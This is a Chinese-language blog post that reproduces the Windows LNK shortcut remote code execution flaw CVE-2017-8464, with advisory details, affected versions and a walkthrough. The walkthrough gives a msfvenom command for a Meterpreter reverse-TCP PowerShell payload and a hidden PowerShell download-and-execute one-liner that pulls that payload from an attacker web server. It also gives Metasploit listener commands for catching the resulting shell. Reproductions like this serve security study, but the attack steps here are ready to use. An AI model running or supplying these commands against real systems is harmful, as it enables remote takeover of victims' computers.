Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

时间:2023-03-08 22:39:47
Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危
具体详情如下:         

漏洞编号
CVE-2017-8464
漏洞名称
Microsoft Windows
官方评级:
高危
漏洞描述:
攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
注释:.LNKwindows系统内应用程序快捷方式文件的文件类型后缀名。
漏洞利用条件和方式
远程利用
漏洞影响范围
桌面系统

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

服务器系统

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

漏洞还原:

利用原理:创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒

复现过程:

 1.利用msf生成一个msf反弹后门ps1,把ps1放入/var/www/html启动apache服务器。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=4444 -f psh-reflection >1234.ps1

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

成功生成

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

把生成的移动到/var/www/html/目录下

开启apache服务

service apache2 start

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

2.创建的powershell快捷方式

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.120.136/1234.ps1');xx.ps1"

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

点击完成.

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

3.使用msf监听模块监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.120.136

run执行

打开我们生成的1234.ps1

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)

成功,

最后附上一张图

Microsoft Windows CVE-2017-8464 LNK 远程代码执行漏洞(复现)